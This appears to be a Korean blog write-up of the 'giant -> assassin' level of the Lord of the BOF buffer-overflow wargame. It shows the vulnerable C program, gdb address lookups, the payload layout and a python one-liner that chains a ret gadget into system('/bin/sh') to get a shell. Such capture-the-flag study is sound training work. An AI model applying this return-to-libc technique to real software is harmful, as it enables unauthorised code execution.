ABOUT ME

-

Today
-
Yesterday
-
Total
-
  • [lob] giant -> assassin
    공부/LOB 2014. 7. 30. 20:07

    [giant@localhost giant]$ ls
    assassin  assassin.c
    [giant@localhost giant]$ cat assassin.c
    /*
            The Lord of the BOF : The Fellowship of the BOF
            - assassin
            - no stack, no RTL
    */

    #include <stdio.h>
    #include <stdlib.h>

    main(int argc, char *argv[])
    {
        char buffer[40];

        if(argc < 2){
            printf("argv error\n");
            exit(0);
        }

        if(argv[1][47] == '\xbf')
        {
            printf("stack retbayed you!\n");
            exit(0);
        }

            if(argv[1][47] == '\x40')
            {
                    printf("library retbayed you, too!!\n");
                    exit(0);
            }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

            // buffer+sfp hunter
            memset(buffer, 0, 44);
    }
    [giant@localhost giant]$

    Breakpoint 1, 0x804839b in main ()
    (gdb) p system
    $1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>
    (gdb)

    [giant@localhost giant]$ ./find
    /bin/sh : 0x400fbff9

    payload = 더미 44byte + 메모리의 ret주소 (0804851E) + system함수 주소 + 리턴 어드레스(BBBB) + /bin/sh주소

    [giant@localhost giant]$ ./assassin `python -c'print "A"*44+"\x1e\x85\x04\x08"+"\xe0\x8a\x05\x40"+"BBBB"+"\xf9\xbf\x0f\x40"'`
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA??@BBBB廈@
    bash$ Xshell
    bash$ my-pass
    euid = 515
    pushing me away
    bash$

    '공부 > LOB' 카테고리의 다른 글

    [lob] zombie_assassin -> succubus  (0) 2015.02.17
    [lob] assassin -> zombie_assassin  (0) 2014.07.30
    [lob] giant -> assassin  (0) 2014.07.30
    [lob] bugbear -> giant  (0) 2014.07.30
    [lob] darkknight -> bugbrear  (0) 2014.07.30
    [lob] golem -> darknight  (0) 2014.07.30

    댓글 0

Designed by Tistory.